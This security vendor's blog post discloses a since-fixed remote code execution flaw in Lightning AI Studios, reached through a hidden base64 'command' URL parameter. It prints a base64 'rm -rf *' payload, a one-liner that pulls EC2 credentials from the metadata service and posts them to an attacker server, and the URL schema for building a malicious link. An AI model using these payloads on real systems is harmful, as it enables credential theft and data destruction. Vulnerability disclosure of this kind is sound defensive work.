The fast-paced evolution of AI demands agility and innovation, but this “move fast and break things” approach comes with inherent risks. While MLOps platforms unlock tremendous opportunities, vulnerabilities within these systems can have far-reaching consequences, underscoring the critical need for comprehensive security controls throughout every stage of the AI development lifecycle.
At Noma Security, our research team has collaborated with leading AI companies to identify and address common security risks that could expose sensitive user data. Our commitment to proactive security research aims to fortify the industry’s defenses and promote safer AI innovation.
Our first blog will focus on one of the widely adopted AI-development tools, Lightning AI Studios.
Executive Summary
This article examines a resolved vulnerability with a CVSS score of 9.4 in Lightning AI’s platform that allowed Remote Code Execution (RCE) through the exploitation of a hidden URL parameter, enabling attackers to potentially execute arbitrary commands with root privileges. This level of access could hypothetically be leveraged for a range of malicious activities, including the extraction of sensitive keys from targeted accounts, which will be demonstrated within this article.
Below is a summary of the attack flow:
- An attacker identified the necessary details about a target such as username and the name of their Lightning AI Studio, both of which are publicly accessible through the Studio templates gallery
- An attacker could automatically craft a malicious link containing code designed for execution on the identified Studio under root permissions.
- Upon clicking on that malicious link, the malicious command could be executed on an authenticated target in a privileged context, successfully completing the RCE attack.
About Lightning AI
Lightning AI, the creator of PyTorch Lightning and Lightning Studios offers an all-in-one AI development platform for enterprise-grade AI. Lightning provides full code, low-code and no-code tools to build agents, AI applications and generative AI solutions, Lightning fast. Designed for flexibility, it runs seamlessly on your cloud or theirs leveraging the expertise and support of a 3M+ strong developer community.
Lightning Studios and their advanced open-source stack like PyTorch Lightning (with almost 30K stars on GitHub), LitServe and Fabric, streamline every step, from training, serving, RAG and everything in between. Customers deliver enterprise-grade AI in weeks not months while reducing cloud costs by ~60% with features like auto-sleep, fault tolerance, blazing cold starts and more.
How Lightning AI Studio works
Lightning AI Studio is a flexible platform where each “Studio” serves as a persistent, cloud-based workspace capable of handling diverse data types like images, videos, and text. Accessible via web browser or cloud integration, each Studio functions as a self-contained environment with its own files, data, and infrastructure, preserving installed dependencies and modifications. Built on a VSCode-like IDE, it offers a familiar development experience with added features from Lightning AI, such as an integrated terminal.
For more information about the powerful tool of Lightning AI Studios, visit their official webpage.
Caption: On the left, an example of studio files; on the right, a terminal opened in a new window.
Attack Flow Details of the RCE Vulnerability
Upon inspection of the JavaScript, we noticed a hidden parameter called command embedded in the URL. Although hidden from the user, it could be modified in the URL to execute arbitrary commands directly in the terminal. This behavior indicated the potential for arbitrary command execution.
In order to exploit the command parameter, it needed to be encoded in Base64 format, which in turn was decoded and executed by the platform. For example, by crafting the malicious command rm -rf *, into the following payload command=cm0gLXJmICo= (which is the base64 representation of said command), and appending it to the URL, we could have executed this malicious command to forcefully and recursively delete all files.
We discovered more malicious potential use cases when testing commands tapping into AWS metadata, potentially exposing sensitive data like access tokens and user information.
For example, the following base64-
cmVzcG9uc2U9JChjdXJsIC1zIGh0dHA6Ly8xNjkuMjU0LjE2OS4yNTQvbGF0ZXN0L21ldGEtZGF0Y
S9pZGVudGl0eS1jcmVkZW50aWFscy9lYzIvc2VjdXJpdHktY3JlZGVudGlhbHMvZWMyLWluc3Rhbm
NlKSAmJiBjdXJsIC1YIFBPU1QgLUggIkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbiIgLWQ
gIiRyZXNwb25zZSIgaHR0cDovL3QwdTkxYmNqa20wdnBrdWs0cnNrb3pwdW9sdWNpMzZzLm9hc3Rp
ZnkuY29t
Will be decoded to:
response=$(curl -s https://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance) && curl -X POST -H "Content-Type: application/json" -d "$response" ATTACKER_REMOTE_SERVER
This command will send the identity-credentials to the attacker’s remote server.
Crafting the malicious URL
The vulnerability in Lightning AI Studio was in how the platform handled user-specific URLs, particularly through the PROFILE_USERNAME and STUDIO_PATH variables embedded in the URL schema. These URLs allowed access to any publicly shared studio within the platform and followed this schema:
https://lightning.ai/PROFILE_USERNAME/vision-model/studios/STUDIO_PATH/terminal?fullScreen=true
The two variables in the URL schema, PROFILE_USERNAME and STUDIO_PATH, were key to the vulnerability.
- PROFILE_USERNAME is the name that each user gets when registering to Lightning AI, and this name can be found on the user profile page. This can be taken from https://lightning.ai/PROFILE_USERNAME
- STUDIO_PATH is the path of the studio that the user uses; it can be found in the shared studios section.
So, an attacker could craft a URL that included the command parameter and share it via email, forums or its own website and every victim that clicked, visited or used the crafted link would be redirected to the terminal with the malicious URL.
For example,
https://lightning.ai/PROFILE_USERNAME/vision-model/studios/STUDIO_PATH/terminal?fullScreen=true&commmand=cmVzc...
To demonstrate how this vulnerability could be exploited, here’s a short PoC (Proof of Concept) recording from before it was fixed.
Impact
A malicious URL could enable execution of arbitrary malicious command using root privileges, including but not limited to:
- Remote Code Execution: Attackers could execute arbitrary privileged commands in the terminal through the authenticated user, gaining root access.
- Data Exfiltration: Sensitive AWS metadata, tokens, and user data could be accessed and sent to an attacker’s remote server.
- File System Manipulation: Attackers could create, delete, or modify files on the server.
In summary, if exploited by a malicious actor, this vulnerability could have posed a significant risk to both individual users and the creators of shared studios within Lightning AI Studio, with a high probability of exploitation through minimal interaction. The impact could range from unauthorized access to sensitive data or systems to compromising the functionality of the shared studio environment.
Again, vulnerabilities like these underscore the importance of mapping and securing the tools and systems used for building, training, and deploying AI models because of their sensitive nature.
Takeaways
In close collaboration with Lightning AI, we have suggested the following principles to be implemented by the Lightning team, based on their unique knowledge of their system:
- Never trust user-modifiable inputs, even if they are hidden or “non-visible” to users. This includes query parameters, hidden form fields, and URL segments. Always sanitize, validate, and restrict input to a fixed set of known-safe values.
- Avoid direct execution of user-controlled inputs. Directly executing user-provided inputs can introduce risks, as it may allow unintended commands to be processed. A safer approach is to use secure execution methods that isolate or strictly control input handling, reducing the likelihood of command injection vulnerabilities.
- AI development environments should adhere to the principle of least privilege. Developers, processes, and scripts should only have access to what is essential for their task.
Thanks
We’re proud to collaborate with organizations like Lightning AI that share a strong commitment to securing the AI development ecosystem. Their urgency and collaboration in addressing this vulnerability demonstrate the power of partnership in maintaining a safer environment for AI innovation.
About Noma Security
Noma enables AppSec teams with complete visibility, security, protection, and compliance across the entire Data & AI Lifecycle — from development to production and from classic data pipelines and ML to GenAI. By combining data and AI supply chain security, AI security posture management, and AI runtime protection in a single platform, Noma seamlessly deploys across any cloud-based, SaaS, or self-hosted environment within minutes, requiring no agents or code changes and adding no friction to data science teams’ day-to-day workflows.
Interested in learning more? Get a demo of the Noma Security Platform
Responsible Disclosure Timeline
- October 14, 2024: RCE found on Lightning AI studio.
- October 14, 2024: Initiated discussion with the Lightning AI team via Discord
- October 14, 2024: First response from the Lightning AI team
- October 20, 2024: Second correspondence
- October 25, 2024: Approved and a fix released
Links
- https://thehackernews.com/2025/01/lightning-ai-studio-vulnerability.html
- https://cybersecuritynews.com/critical-rce-vulnerability-found-in-ai-development-platform/
- https://cyberscoop.com/lightningai-vulnerability-noma-cloud-phishing/
- https://cybernews.com/security/critical-vulnerability-ai-development-platform-lightning-ai/


